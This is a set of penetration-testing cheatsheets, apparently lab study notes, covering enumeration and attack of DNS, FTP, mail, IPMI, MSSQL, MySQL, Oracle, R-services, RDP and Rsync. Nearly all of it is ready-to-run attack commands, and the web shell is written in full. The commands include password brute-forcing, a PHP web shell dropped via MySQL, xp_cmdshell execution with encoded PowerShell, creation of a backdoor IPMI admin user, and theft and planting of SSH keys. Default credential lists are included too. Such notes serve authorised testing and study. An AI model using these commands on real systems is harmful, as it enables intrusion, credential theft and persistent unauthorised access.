Footprinting

DNS Enumeration Cheatsheet Default Port: 53 (TCP/UDP) Key DNS Record Types Record Description A IPv4 address AAAA IPv6 address MX Mail server NS Name server TXT Text records (SPF, DMARC, verification) CNAME Canonical name / alias SOA Start of authority PTR Reverse lookup SRV Service location Basic Lookups # host host <domain> host -t A <domain> host -t MX <domain> host -t NS <domain> host -t TXT <domain> host -t CNAME <domain> # dig dig <domain> dig <domain> ANY dig <domain> A dig <domain> MX dig <domain> NS dig <domain> TXT dig @<nameserver> <domain> ANY +noall +answer # nslookup nslookup <domain> nslookup -type=MX <domain> nslookup -type=NS <domain> Zone Transfer dig axfr @<nameserver> <domain> host -l <domain> <nameserver> fierce --domain <domain> Subdomain Enumeration # dnsenum dnsenum --dnsserver <ns> --enum -p 0 -s 0 -o output.txt -f wordlist.txt <domain> dnsenum --enum inlanefreight.htb -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r # dnsrecon dnsrecon -d <domain> -t std # Standard enumeration dnsrecon -d <domain> -t axfr # Zone transfer attempt dnsrecon -d <domain> -t brt -D wordlist.txt # Brute force subdomains # gobuster DNS mode gobuster dns -d <domain> -w wordlist.txt -r <nameserver> # Sublist3r sublist3r -d <domain> # Amass amass enum -d <domain> amass enum -passive -d <domain> Nmap DNS Scripts nmap -p 53 --script dns-brute <domain> nmap -p 53 --script dns-zone-transfer \ --script-args dns-zone-transfer.domain=<domain> <nameserver> nmap -p 53 --script dns-nsid <nameserver> nmap -p 53 --script dns-recursion <nameserver> nmap -p 53 --script dns-cache-snoop <nameserver> Reverse DNS Lookup dig -x <ip> host <ip> dnsrecon -r <cidr> -t rvl # Example dig -x 192.168.1.1 host 192.168.1.1 Wordlists (SecLists) /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt

FTP Enumeration Cheatsheet Default Ports: 21 (control), 20 (data - active mode) Banner Grabbing & Connection nc -nv <ip> 21 telnet <ip> 21 ftp <ip> openssl s_client -connect <ip>:21 -starttls ftp # FTPS Anonymous Login ftp <ip> # Username: anonymous # Password: anonymous (or leave blank) # Via curl curl -v ftp://<ip>/ --user anonymous:anonymous curl -v ftp://<ip>/<path>/ --user anonymous:anonymous FTP Commands (Once Connected) USER <username> # Send username PASS <password> # Send password SYST # Display system type STAT # Status / verbose file listing LIST # List files (verbose) NLST # Name list (simple) PWD # Print working directory CWD <dir> # Change directory GET <file> # Download file PUT <file> # Upload file MGET * # Download all files BINARY # Switch to binary transfer mode ASCII # Switch to ASCII transfer mode PASV # Enter passive mode QUIT # Disconnect Nmap FTP Scripts nmap -p 21 --script ftp-anon <ip> # Check anonymous login nmap -p 21 --script ftp-banner <ip> # Banner grab nmap -p 21 --script ftp-brute <ip> # Brute force credentials nmap -p 21 --script ftp-bounce <ip> # FTP bounce attack check nmap -p 21 --script ftp-syst <ip> # SYST command response nmap -p 21 --script ftp-vsftpd-backdoor <ip> # vsFTPd 2.3.4 backdoor check nmap -p 21 -sV --script ftp-* <ip> # Run all FTP scripts Brute Force hydra -l <user> -P wordlist.txt ftp://<ip> hydra -L users.txt -P wordlist.txt ftp://<ip> medusa -u <user> -P wordlist.txt -h <ip> -M ftp Bulk Download # wget recursive download (no passive mode) wget -m --no-passive ftp://anonymous:anonymous@<ip> # curl recursive curl -s ftp://<ip>/ --user anonymous:anonymous | awk '{print $NF}' | \ while read f; do curl -s ftp://<ip>/$f --user anonymous:anonymous -O; done Key Vulnerabilities Software CVE Description vsFTPd 2.3.4 CVE-2011-2523 Backdoor shell on port 6200 ProFTPd 1.3.5 CVE-2015-3306 mod_copy unauthenticated file copy ProFTPd 1.3.3c CVE-2010-4221 Remote heap overflow

IMAP / POP3 Enumeration Cheatsheet Default Ports: IMAP: 143 (plain), 993 (SSL/TLS) POP3: 110 (plain), 995 (SSL/TLS) Banner Grabbing nc -nv <ip> 110 # POP3 nc -nv <ip> 143 # IMAP openssl s_client -connect <ip>:993 # IMAPS openssl s_client -connect <ip>:995 # POP3S openssl s_client -connect <ip>:143 -starttls imap # STARTTLS IMAP POP3 Commands (Manual) USER <username> PASS <password> STAT # Mailbox stats (message count, total size) LIST # List all messages with sizes LIST <n> # Info for message n RETR <n> # Retrieve (download) message n DELE <n> # Mark message n for deletion TOP <n> <lines> # Retrieve headers + first N lines of message n UIDL # Unique ID listing for all messages NOOP # Keep-alive RSET # Unmark any deletions QUIT # Commit deletes and disconnect IMAP Commands (Manual) a LOGIN <user> <pass> a CAPABILITY # Show server capabilities a LIST "" "*" # List all mailboxes a SELECT INBOX # Select inbox a STATUS INBOX (MESSAGES UNSEEN) # Inbox stats a FETCH 1:* (FLAGS) # List messages with flags a FETCH 1 (BODY[]) # Download full message 1 a FETCH 1 (BODY[HEADER]) # Headers only a FETCH 1 (BODY[TEXT]) # Body only a SEARCH ALL # Search all messages a SEARCH UNSEEN # Search unread messages a EXAMINE INBOX # Read-only select a LOGOUT Nmap Scripts nmap -p 110,143,993,995 --script imap-capabilities <ip> nmap -p 110,143,993,995 --script pop3-capabilities <ip> nmap -p 110 --script pop3-brute <ip> nmap -p 143 --script imap-brute <ip> nmap -p 993,995 --script imap-ntlm-info <ip> # Windows NTLM info leak Brute Force hydra -l <user> -P wordlist.txt imap://<ip> hydra -l <user> -P wordlist.txt pop3://<ip> hydra -l <user> -P wordlist.txt -s 993 -S imap://<ip> # IMAPS hydra -l <user> -P wordlist.txt -s 995 -S pop3://<ip> # POP3S curl Mail Access # List mailboxes curl -k 'imaps://<ip>' --user <user>:<pass> # List INBOX contents curl -k 'imaps://<ip>/INBOX' --user <user>:<pass> # Read specific message curl -k 'imaps://<ip>/INBOX;MAILINDEX=1' --user <user>:<pass> # POP3 via curl curl -k 'pop3s://<ip>' --user <user>:<pass> curl -k 'pop3s://<ip>/1' --user <user>:<pass> # Download message 1

IPMI Enumeration Cheatsheet Default Port: 623 (UDP) What is IPMI? Intelligent Platform Management Interface — out-of-band management for servers (iDRAC, iLO, BMC). Can give full remote control even if OS is down. Detection & Version nmap -sU -p 623 <ip> nmap -sU -p 623 --script ipmi-version <ip> Nmap Scripts nmap -sU -p 623 --script ipmi-version <ip> nmap -sU -p 623 --script ipmi-cipher-zero <ip> # Check for Cipher 0 auth bypass Metasploit Modules # Version detection use auxiliary/scanner/ipmi/ipmi_version set RHOSTS <ip> run # Dump RAKP hashes (no auth needed) use auxiliary/scanner/ipmi/ipmi_dumphashes set RHOSTS <ip> run # Cipher 0 auth bypass (unauthenticated admin access) use auxiliary/scanner/ipmi/ipmi_cipher_zero set RHOSTS <ip> run ipmitool (Direct Interaction) # Version/status ipmitool -I lanplus -H <ip> -U admin -P admin chassis status # List users ipmitool -I lanplus -H <ip> -U admin -P admin user list # LAN config ipmitool -I lanplus -H <ip> -U admin -P admin lan print # Power control ipmitool -I lanplus -H <ip> -U admin -P admin power status ipmitool -I lanplus -H <ip> -U admin -P admin power reset # Add user (post-compromise) ipmitool -I lanplus -H <ip> -U admin -P admin user set name 4 hacker ipmitool -I lanplus -H <ip> -U admin -P admin user set password 4 Password1 ipmitool -I lanplus -H <ip> -U admin -P admin user priv 4 4 # Admin priv ipmitool -I lanplus -H <ip> -U admin -P admin user enable 4 Hash Cracking (After RAKP Dump) # Hashcat mode 7300 = IPMI2 RAKP HMAC-SHA1 hashcat -m 7300 hashes.txt wordlist.txt hashcat -m 7300 hashes.txt wordlist.txt -r rules/best64.rule Default Credentials Vendor / Interface Username Default Password Dell iDRAC root calvin HP iLO Administrator (printed on pull tab) Supermicro IPMI ADMIN ADMIN IBM IMM USERID PASSW0RD Cisco CIMC admin password Intel RMM admin (blank) Key Vulnerabilities Issue Description Cipher 0 Allows unauthenticated auth bypass — attacker can set any password RAKP hash dump IPMI spec allows anyone to request auth hash → offline crack Default creds Most systems ship with known default credentials Anonymous auth Some BMCs allow completely anonymous access

MSSQL Enumeration Cheatsheet Default Ports: 1433 (TCP), 1434 (UDP — SQL Server Browser) Discovery & Nmap Scripts nmap -p 1433 --script ms-sql-info <ip> nmap -p 1433 --script ms-sql-config <ip> nmap -p 1433 --script ms-sql-empty-password <ip> nmap -p 1433 --script ms-sql-brute <ip> nmap -sU -p 1434 --script ms-sql-dac <ip> # Discover dynamic ports via UDP nmap -p 1433 --script ms-sql-* <ip> # All MSSQL scripts Metasploit Modules use auxiliary/scanner/mssql/mssql_ping # Discovery + version use auxiliary/scanner/mssql/mssql_login # Brute force auth use auxiliary/admin/mssql/mssql_sql # Execute SQL query use auxiliary/admin/mssql/mssql_exec # OS command execution (xp_cmdshell) use auxiliary/admin/mssql/mssql_enum # Full enumeration use auxiliary/admin/mssql/mssql_enum_sql_logins # Enumerate SQL logins mssqlclient.py (impacket) # Connect with SQL auth python3 mssqlclient.py <user>:<pass>@<ip> # Connect with Windows auth python3 mssqlclient.py <domain>/<user>:<pass>@<ip> -windows-auth # Connect with hash (Pass-the-Hash) python3 mssqlclient.py <domain>/<user>@<ip> -hashes :<nthash> -windows-auth Useful SQL Queries -- Version and user info SELECT @@version; SELECT system_user; SELECT user_name(); SELECT DB_NAME(); -- Check if sysadmin SELECT IS_SRVROLEMEMBER('sysadmin'); SELECT IS_MEMBER('db_owner'); -- List databases SELECT name FROM sys.databases; USE <database>; SELECT table_name FROM information_schema.tables; -- List users and roles SELECT name, type_desc FROM sys.server_principals; SELECT name FROM sys.syslogins; SELECT roles.name FROM sys.server_role_members JOIN sys.server_principals AS roles ON roles.principal_id = server_role_members.role_principal_id JOIN sys.server_principals AS members ON members.principal_id = server_role_members.member_principal_id WHERE members.name = '<user>'; xp_cmdshell (OS Command Execution) -- Enable xp_cmdshell (requires sysadmin) EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- Run commands EXEC xp_cmdshell 'whoami'; EXEC xp_cmdshell 'net user'; EXEC xp_cmdshell 'powershell -enc <base64payload>'; Linked Servers (Lateral Movement) -- Enumerate linked servers SELECT * FROM sys.servers; EXEC sp_linkedservers; -- Execute query on linked server EXECUTE('SELECT @@version') AT [<linked_server>]; EXECUTE('SELECT system_user') AT [<linked_server>]; -- Execute OS command via linked server EXECUTE('EXEC xp_cmdshell ''whoami''') AT [<linked_server>]; Brute Force hydra -l sa -P wordlist.txt mssql://<ip> medusa -h <ip> -u sa -P wordlist.txt -M mssql crackmapexec mssql <ip> -u <user> -p wordlist.txt File Read / Write -- Read file (via BULK INSERT or OPENROWSET) SELECT * FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS t; -- Write file (via xp_cmdshell) EXEC xp_cmdshell 'echo hacked > C:\inetpub\wwwroot\shell.txt';

MySQL Enumeration Cheatsheet Default Port: 3306 (TCP) Connection & Banner Grabbing nc -nv <ip> 3306 # Banner grab mysql -u root -h <ip> # No password mysql -u root -p -h <ip> # Prompt for password mysql -u root -p<password> -h <ip> # Inline password (no space) mysql -u root -h <ip> -e "SELECT version();" # One-liner query Nmap Scripts nmap -p 3306 --script mysql-info <ip> nmap -p 3306 --script mysql-databases \ --script-args mysqluser=root,mysqlpass='' <ip> nmap -p 3306 --script mysql-empty-password <ip> nmap -p 3306 --script mysql-brute <ip> nmap -p 3306 --script mysql-audit <ip> nmap -p 3306 --script mysql-vuln-cve2012-2122 <ip> nmap -p 3306 --script mysql-* <ip> # All MySQL scripts Enumeration Queries -- Version and environment SELECT version(); SELECT @@version; SELECT user(); SELECT @@datadir; SELECT @@basedir; SELECT @@hostname; -- Databases and tables SHOW databases; USE <database>; SHOW tables; DESCRIBE <table>; SELECT * FROM <table> LIMIT 5; SELECT table_schema, table_name FROM information_schema.tables; -- Users and privileges SELECT user, host, authentication_string FROM mysql.user; SELECT user, host, password FROM mysql.user; -- older MySQL SELECT * FROM information_schema.user_privileges; SHOW GRANTS FOR '<user>'@'<host>'; SHOW GRANTS FOR CURRENT_USER(); -- Check FILE privilege SELECT user, host, File_priv FROM mysql.user; File Read / Write (Requires FILE Privilege) -- Read files SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/etc/shadow'); SELECT LOAD_FILE('C:/Windows/System32/drivers/etc/hosts'); -- Write files (web shell) SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; -- Write SSH key SELECT 'ssh-rsa AAAA...' INTO OUTFILE '/root/.ssh/authorized_keys'; Brute Force hydra -l root -P wordlist.txt mysql://<ip> hydra -L users.txt -P wordlist.txt mysql://<ip> medusa -h <ip> -u root -P wordlist.txt -M mysql User-Defined Functions (UDF) for Privilege Escalation -- Check if plugin dir is writable (post-login) SHOW variables LIKE 'plugin_dir'; -- Drop malicious UDF .so/.dll into plugin dir, -- then create the function and execute OS commands CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('id > /tmp/out'); Common Credentials to Try root : (blank) root : root root : password root : mysql root : toor admin : admin

Oracle TNS Enumeration Cheatsheet Default Port: 1521 (TCP) Nmap Scripts nmap -p 1521 --script oracle-tns-version <ip> nmap -p 1521 --script oracle-sid-brute <ip> nmap -p 1521 --script oracle-brute <ip> nmap -p 1521 --script oracle-brute-stealth <ip> nmap -p 1521 --script oracle-enum-users \ --script-args oracle-enum-users.sid=<sid> <ip> ODAT (Oracle Database Attacking Tool) # Full automated scan odat all -s <ip> -p 1521 # SID brute force odat sidguesser -s <ip> -p 1521 # Password brute force (after getting SID) odat passwordguesser -s <ip> -p 1521 -d <sid> # File read/write (requires UTL_FILE privilege) odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd /tmp/passwd.txt odat utlfile -s <ip> -d <sid> -U <user> -P <pass> --putFile /tmp shell.php shell.php # OS command execution (requires Java) odat java -s <ip> -d <sid> -U <user> -P <pass> --exec "whoami" # External table method for file read odat externaltable -s <ip> -d <sid> -U <user> -P <pass> --getFile /etc/passwd sqlplus (Direct Connection) # Install: sudo apt install oracle-instantclient-sqlplus # Connect sqlplus <user>/<pass>@<ip>:<port>/<sid> sqlplus <user>/<pass>@<ip>:<port>/<sid> as sysdba sqlplus <user>/<pass>@//<ip>:<port>/<service_name> Common SIDs to Try XE ORCL DB DATABASE PROD TEST DEV ORACLE OEMREP ORACLR_CONNECTION_DATA Enumeration Queries (Once Connected) -- Version and user SELECT * FROM v$version; SELECT user FROM dual; SELECT * FROM session_privs; -- Database objects SELECT * FROM all_tables; SELECT owner, table_name FROM all_tables WHERE owner != 'SYS'; SELECT column_name, data_type FROM all_tab_columns WHERE table_name = '<TABLE>'; -- Users and privileges SELECT username FROM dba_users; SELECT * FROM user_role_privs; SELECT * FROM dba_sys_privs WHERE grantee = '<user>'; -- Password hashes (as SYSDBA) SELECT name, password FROM sys.user$; SELECT name, spare4 FROM sys.user$; -- SHA-1 hashes (11g+) -- Check for DBA role SELECT * FROM session_privs WHERE privilege = 'CREATE SESSION'; Privilege Escalation via Java -- Grant Java permissions (as DBA) EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute'); EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); -- Execute OS command via Java SELECT dbms_java.runjava('oracle/aurora/util/Wrapper /bin/bash -c "id > /tmp/out"') FROM dual; Brute Force hydra -l <user> -P wordlist.txt -s 1521 oracle://<ip>/<sid> nmap -p 1521 --script oracle-brute \ --script-args oracle-brute.sid=<sid> <ip> Default Credentials Username Password Notes sys change_on_install sysdba system manager scott tiger Classic demo user dbsnmp dbsnmp SNMP agent mdsys mdsys hr hr

R-Services Enumeration Cheatsheet Default Ports: rexec: 512 (TCP) rlogin: 513 (TCP) rsh / rcp: 514 (TCP) rpcbind / portmapper: 111 (TCP/UDP) Note: R-services transmit data in cleartext and rely on IP-based trust. They are largely obsolete but still found in legacy Unix/Linux environments. Detection nmap -p 512-514 <ip> nmap -p 512-514 -sV <ip> nmap -p 111 <ip> rlogin # Login as current user rlogin <ip> # Login as specific user rlogin -l <user> <ip> rsh (Remote Shell) # Execute command remotely rsh <ip> <command> rsh -l <user> <ip> whoami rsh -l <user> <ip> cat /etc/passwd rsh -l <user> <ip> /bin/bash rexec (Remote Exec) rexec <ip> -l <user> <command> rexec <ip> -l <user> id rpcbind / Portmapper (Port 111) # List all registered RPC services rpcinfo -p <ip> # List NFS mounts (if NFS is running) showmount -e <ip> # Nmap nmap -p 111 --script rpcinfo <ip> nmap -p 111 --script nfs-ls <ip> nmap -p 111 --script nfs-showmount <ip> nmap -p 111 --script nfs-statfs <ip> rwho / ruptime # List logged-in users across trusted hosts rwho # Show uptime across trusted hosts ruptime Trust Files (Critical Targets) These files define which hosts/users can connect without a password: ...

RDP Enumeration Cheatsheet Default Port: 3389 (TCP) Detection & Info Gathering nmap -p 3389 -sV <ip> nmap -p 3389 --script rdp-enum-encryption <ip> nmap -p 3389 --script rdp-vuln-ms12-020 <ip> nmap -p 3389 --script rdp-enum-encryption,rdp-vuln-ms12-020,rdp-ntlm-info <ip> Check NLA (Network Level Auth) # If NLA is required, credential prompt appears BEFORE full connection nmap -p 3389 --script rdp-enum-encryption <ip> # Look for: "Security layer: NLA" or "CredSSP" # rdp_check.py (impacket) — tests credential validity python3 rdp_check.py <domain>/<user>:<pass>@<ip> Password Attacks # Hydra hydra -l <user> -P wordlist.txt rdp://<ip> hydra -L users.txt -P wordlist.txt rdp://<ip> hydra -l <user> -P wordlist.txt rdp://<ip> -t 4 # Limit threads (RDP is picky) # Crowbar crowbar -b rdp -s <ip>/32 -u <user> -C wordlist.txt crowbar -b rdp -s 192.168.1.0/24 -U users.txt -C wordlist.txt # Metasploit use auxiliary/scanner/rdp/rdp_scanner set RHOSTS <ip> run Connecting via Linux # xfreerdp (recommended) xfreerdp /u:<user> /p:<pass> /v:<ip> xfreerdp /u:<user> /p:<pass> /v:<ip> /d:<domain> xfreerdp /u:<user> /p:<pass> /v:<ip> /drive:share,/tmp # Mount local dir xfreerdp /u:<user> /p:<pass> /v:<ip> /cert-ignore # Ignore cert errors xfreerdp /u:<user> /h:<nthash> /v:<ip> # Pass-the-Hash # rdesktop rdesktop <ip> rdesktop -u <user> -p <pass> -d <domain> <ip> # Remmina (GUI) remmina -c rdp://<user>@<ip> Session Hijacking (Post-Exploitation) # List sessions (on Windows target) query session query user # Hijack disconnected session (as SYSTEM) tscon <session_id> /dest:<current_session> Key Vulnerabilities CVE Name Affected Systems Description CVE-2019-0708 BlueKeep Win7, WinXP, Server 2008 Pre-auth RCE via RDP CVE-2019-1181 DejaBlue Win8, Win10, Server 2012+ Pre-auth RCE via RDP CVE-2019-1182 DejaBlue Win8, Win10, Server 2012+ Pre-auth RCE via RDP CVE-2012-0002 MS12-020 Multiple DoS / potential code execution BlueKeep Check (Metasploit) use auxiliary/scanner/rdp/cve_2019_0708_bluekeep set RHOSTS <ip> run Useful Options # Custom RDP port xfreerdp /u:<user> /p:<pass> /v:<ip>:<port> # Enable clipboard sharing xfreerdp /u:<user> /p:<pass> /v:<ip> +clipboard # Full screen xfreerdp /u:<user> /p:<pass> /v:<ip> /f # Dynamic resolution xfreerdp /u:<user> /p:<pass> /v:<ip> /dynamic-resolution

Rsync Enumeration Cheatsheet Default Port: 873 (TCP) Detection nmap -p 873 <ip> nmap -p 873 -sV <ip> nmap -p 873 --script rsync-list-modules <ip> nc -nv <ip> 873 List Available Modules (Shares) # List modules (no auth) rsync -av --list-only rsync://<ip>/ rsync rsync://<ip>/ # nc banner grab nc -nv <ip> 873 # Then type: #list Enumerate Files in a Module rsync -av --list-only rsync://<ip>/<module>/ rsync -av --list-only rsync://<ip>/<module>/subdir/ # Recursive listing of entire module rsync -r --list-only rsync://<ip>/<module>/ Download Files # Download single file rsync rsync://<ip>/<module>/file.txt ./ # Download entire module rsync -av rsync://<ip>/<module>/ ./local_copy/ # With credentials rsync -av rsync://<user>@<ip>/<module>/ ./ rsync --password-file=pass.txt rsync://<user>@<ip>/<module>/ ./ # Dry run (see what would be downloaded) rsync -av --dry-run rsync://<ip>/<module>/ ./ Upload Files # Upload single file rsync -av ./shell.php rsync://<user>@<ip>/<module>/ # Upload directory rsync -av ./payload/ rsync://<user>@<ip>/<module>/uploads/ # With password file rsync --password-file=pass.txt -av ./file rsync://<user>@<ip>/<module>/ High-Value Paths to Check rsync -av --list-only rsync://<ip>/home/ rsync -av --list-only rsync://<ip>/root/ rsync -av --list-only rsync://<ip>/etc/ rsync -av --list-only rsync://<ip>/backup/ rsync -av --list-only rsync://<ip>/var/www/ rsync -av --list-only rsync://<ip>/.ssh/ SSH Key Theft & Planting # Download .ssh directory rsync -av rsync://<ip>/home/<user>/.ssh/ ./stolen_keys/ # Plant authorized_keys (if write access) rsync -av ~/.ssh/id_rsa.pub rsync://<user>@<ip>/home/<user>/.ssh/authorized_keys Nmap Scripts nmap -p 873 --script rsync-list-modules <ip>